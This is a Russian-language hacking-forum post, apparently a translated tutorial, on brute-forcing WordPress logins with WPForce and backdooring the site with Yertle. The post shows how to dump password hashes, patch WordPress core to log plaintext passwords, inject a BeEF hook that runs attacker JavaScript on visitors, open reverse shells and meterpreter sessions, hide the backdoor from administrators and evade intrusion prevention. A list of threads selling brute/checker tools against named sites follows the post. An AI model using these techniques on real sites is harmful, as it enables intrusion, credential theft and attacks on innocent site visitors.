Брут-форс и эксплуатация скомпрометированных WordPress

I

ins1der

Original poster
WordPress является крайне популярной системой правления контентом. Она работает на PHP, обычно поверх

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Хотя большинство серверов WordPress имеют надёжные пароли и безопасные плагины, во внутренних сетях это редкость. По этим причинам атакующий часто может найти уязвимости в устаревших версиях программного обеспечения или ещё проще, угадать пароль администратора. Узнав пароль, вы можете сделать различные вещи для вклинивания в другие системы. Кроме повышения привилегий, вы можете использовать сам WordPress для запуска ряда других атак в отношении клиентов.

Самым популярным инструментом для анализа WordPress является

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Он способен найти уязвимые версии плагинов, тем и самого WordPress. Новый инструмент

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

основывает свою работу на других принципах. WPForce выполняет брут-форс аутентификации WordPress не через форму входа, а использует вызовы API аутентификации для тестирования верности учётных данных. Это позволяет обойти некоторые защиты формы входа WordPress, по сравнению с другими программами, WPForce чуть менее заметен.
Screen-Shot-2017-03-29-at-7.58.34-PM.png

После удачного подбора учётных данных, скрипт-компаньон из набора WPForce – Yertle – может использоваться для выгрузки бэкдора на сервер с WordPress и выполнить ряд атак с применением модулей последующей эксплуатации.


Запуск Yertle сравнительно простой. Просто укажите URL, имя пользователя, пароль и тип бэкдора, я предпочитаю --interactive для интерактивного доступа.
Screen-Shot-2017-03-29-at-8.12.07-PM.png

После запуска скрипта, инструмент залогинется на сайт WordPress и выгрузит на него плагин. В любое время, когда вы захотите снова получить доступ к бэкдору, просто укажите аргумент -e с именем директории выгрузки. Плагин будет принимать команды наподобие оболочки

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Для просмотра доступных модулей, вы можете набрать “help” или “?”.

Код:
Основные команды
=============
  
Команда                   Описание
-------                   -----------
?                         Справка
beef                      Внедрить BeEF крюк в веб-сайт
exit                      Завершение сеанса
hashdump                  Сдампить все хеши паролей WordPress
help                      Справка
keylogger                 Патчит ядро WordPress для записи учётных данных в открытом виде
keylog                    Показывает файл с захваченными паролями
meterpreter               Выполняет PHP meterpreter stager для подключения metasploit
quit                      Завершение сеанса
shell                     Отправляет обратный TCP шелл на прослушивальщик netcat
stealth                   Прячет Yertle со страницы плагинов[\code]
Одним из полезных модулей последующей эксплуатации, который вы можете запустить, является hashdump. hashdump зайдёт в SQL базу, запросит таблицу, содержащую хеши паролей и вернёт их в вывод. Затем вы можете взломать эти хеши и начать пробовать использовать эти учётные данные для продвижения буквально в другие системы.
[code]os-shell> hashdump
ID: 1  - Username: admin  Password: $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1  Email: [email protected]
ID: 2  - Username: wpuser  Password: $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S.  Email: [email protected]
ID: 3  - Username: n00py  Password: $P$B0mYQT38IOJtOr/nl4dchdqgCrxsG/.  Email: [email protected]
os-shell>
Мы можем собирать не только хеши, но мы можем также собрать учётные данные в виде простого текста. Это достигается пропатчиванием PHP файла внутри ядра WordPress. Это позволяет записывать все пароли в простом тексте в тот момент, когда пользователи вводят их для аутентификации.
Код:
os-shell> keylogger
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
wp_signon function patched.  Do not run this more than once.  Use 'keylog' to check the log file.
os-shell>
Перевод:

Этот модуль модифицирует файлы внутри ядра WordPress. Хотите продолжить? Введите Y для «Да».

Функция wp_signon пропатчена. Не запускайте это более одного раза. Используйте 'keylog' для проверки файла журнала.


После предупреждения, позволяющего пользователю узнать о модификациях, которые будут сделаны в ядре WordPress, будет пропатчена функция аутентификации.
Screen-Shot-2017-03-29-at-8.36.08-PM.png

Нужно дождаться, когда пользователи вновь залогинятся (именно введут свои учётные данные, а не просто зайдут на сайт), а затем просмотреть файл журнала, это можно сделать набрав команду “keylog”. Она выведет учётные данные в виде простого текста.
Код:
os-shell> keylog
2017-03-30 - Username:  && Password:
2017-03-30 - Username: n00py && Password: thisisalsomynetworkpassword
Отойдём от сбора учётных данных, но останемся в сфере клиентских атак. Мы можем внедрить в сайт крюк

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Это позволит атакующему запускать произвольный JavaScript у пользователей, находящихся на сайта.
Код:
os-shell> beef
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
IP Address: 10.0.1.16
BeEF hook added!  Check BeEF for any hooked clients. Do not run this multiple times.
Перевод:

Этот модуль модифицирует файлы внутри ядра WordPress. Вы хотите продолжить? (введите Y для «Да»)

IP адрес (введите IP адрес компьютера с запущенным BeEF): 10.0.1.16

BeEF добавлен! Проверьте BeEF на наличие подцепленных клиентов. Не запускайте это несколько раз.

После внедрения крюка, мы просто ждём, пока на сайте появятся пользователи. Когда пользователи открыли сайт, они становятся «подцепленными». В это время мы можем отправлять любую нагрузку JavaScript какую мы хотим. BeEF содержит большое количество атак, которые мы можем запустить в отношении клиента.
Screen-Shot-2017-03-29-at-8.42.08-PM.png

Демонстрация полезной нагрузки, выполняемой в клиентском браузере:
Screen-Shot-2017-03-29-at-8.41.42-PM.png

Вы можете также использовать другой тип оболочки. Для этого доступны две опции: обычный обратный TCP шелл и оболочка PHP meterpreter. Чтобы перейти на полностью интерактивную оболочку, просто запустите:
Код:
os-shell> shell
IP Address: 10.0.1.4
Port: 8080
Sending reverse shell to 10.0.1.4 port 8080
os-shell>
И прослушивайте выбранный порт для получения шелла:
Код:
root@Kali:~/WPForce$ nc -l 8080
bash: no job control in this shell
www-data@Quaoar:/var/www/wordpress/wp-content/plugins/aekpmsu$
Если вы хотите иметь шелл meterpreter, загрузите

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

и запустите:
Код:
os-shell> meterpreter
IP Address: 10.0.1.4
Port: 4444
Sending meterpreter stager to connect back to 10.0.1.4:4444
os-shell>
И вы получите внутри metasploit оболочку meterpreter:
Код:
[*] Started reverse handler on 10.0.1.4:4444
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 10.0.1.21
[*] Meterpreter session 1 opened (10.0.1.4:4444 -> 10.0.1.21:60763) at 2017-03-29 20:49:16 -0600
Наконец, есть пара способов быть более незаметным при использовании этого инструмента. По умолчанию, модуль регистрирует себя как плагин WordPress и этот плагин виден администратору.

Screen-Shot-2017-03-29-at-8.51.49-PM.png

Для удаления бэкдора из видимых плагинов, просто запустите команду “stealth”. Бэкдор всё равно будет доступен, его просто не будет видно внутри пользовательского интерфейса.
Код:
os-shell> stealth
Также важно упомянуть, что в качестве пользовательского агента Yertle по умолчанию отправляет “Yertle backdoor uploader”. В реальных условиях это значение следует переписать с помощью флага -a. Поскольку по опытам замечено, что с таким User Agent немедленно блокируется IP, если веб-сервер использует IPS (систему предотвращения вторжений).
 
  • Like
Реакции: Adinson и Sofia
Название темы
Автор Заголовок Раздел Ответы Дата
K Брут-форс формы входа роутеров Уязвимости и взлом 0
K Брут-форс веб-сайтов: инструкция по использованию patator, Hydra, Medusa ЧАСТЬ 2 Уязвимости и взлом 0
K Брут-форс веб-сайтов: инструкция по использованию patator, Hydra, Medusa Уязвимости и взлом 0
Deni4ka Закрыто Брут акки или акки с токенами от Chaturbate Корзина 2
NikitaKit £€$Проект(Брут) на европейское казино$€£ Продажа софта 1
C Проверено [Услуги Разработки] Автоматизация | Брут\Чекеры | ПО любой сложности | OxTeam Продажа софта 3
S Продам Брут дедики по низким ценам Куплю/Продам 2
H ASM – Брут и шифрование Цезарем Корзина 0
Р Интересно Брут TD Bank на BAS Бруты/Парсеры/Чекеры 2
АнАлЬнАя ЧуПаКаБрА Cash Service | Брут/Чекер Проекты Private Keeper 3
АнАлЬнАя ЧуПаКаБрА Passive Income | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Брут/чекер на облачный майнинг. Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Интересно Bluebird-hd [Брут/Чекер] [Приват Кипер] Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА Anywayanyday [Брут/Чекер] [Приват Кипер] Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Фабрика Грёз [Брут/Чекер] [Приват Кипер] Проекты Private Keeper 0
S Брут в hydra Вопросы и интересы 7
АнАлЬнАя ЧуПаКаБрА Интересно [Private UBC] Брут/чек на сайт связанный с Ethereum Проекты UBC 0
АнАлЬнАя ЧуПаКаБрА INLINE [Брут] Вывод с Валидом от 5€ Проекты Private Keeper 0
A Брут доменной почты USА Вопросы и интересы 0
АнАлЬнАя ЧуПаКаБрА INLINE Contributor Stock | Брут/Чекер Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА INLINE Tapbuxs.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Ingramportal.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Вывод На PayPal | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Вывод Раз В Месяц | Брут/Чекер | Сайт Опросов Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Casino BTC | Брут/Чекер Проекты Private Keeper 1
АнАлЬнАя ЧуПаКаБрА INLINE Брут на обменник Проекты Private Keeper 1
АнАлЬнАя ЧуПаКаБрА INLINE Музыкальный Сервис | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE bethesda.net | Брут/Чекер Проекты Private Keeper 5
АнАлЬнАя ЧуПаКаБрА INLINE Lightstock.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE YoOpinion.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Musickickup.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Crowdspring.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Customon.com | Брут/Чекер Проекты Private Keeper 1
АнАлЬнАя ЧуПаКаБрА INLINE Vectorstock.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Thegiftcardcentre.co.uk | Брут/Чекер Проекты Private Keeper 1
АнАлЬнАя ЧуПаКаБрА INLINE Btcclicks.com | Брут/Чекер Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА INLINE Popspins.com | Брут/Чекер Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА INLINE *****trades.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Admitad.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Prezna.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Spreaker.com | Брут/Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Groover.co | Брут/Чекер Проекты Private Keeper 0
G Многофункциональный пентестер Брут/Чекер популярных cms панелей Продажа софта 0
V Avito Брут Корзина 0
АнАлЬнАя ЧуПаКаБрА INLINE Брут на популярную биржу Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Брут Pubg Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА INLINE reddit.com - Брут, чек Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА [Private Keeper] Twite.ru Брут и Чекер [БЕЗ ХАЙДА] Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА [Private Keeper] Linkslot.ru Брут и Чекер Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE *****pay.com | Брут/Чекер Проекты Private Keeper 1

Название темы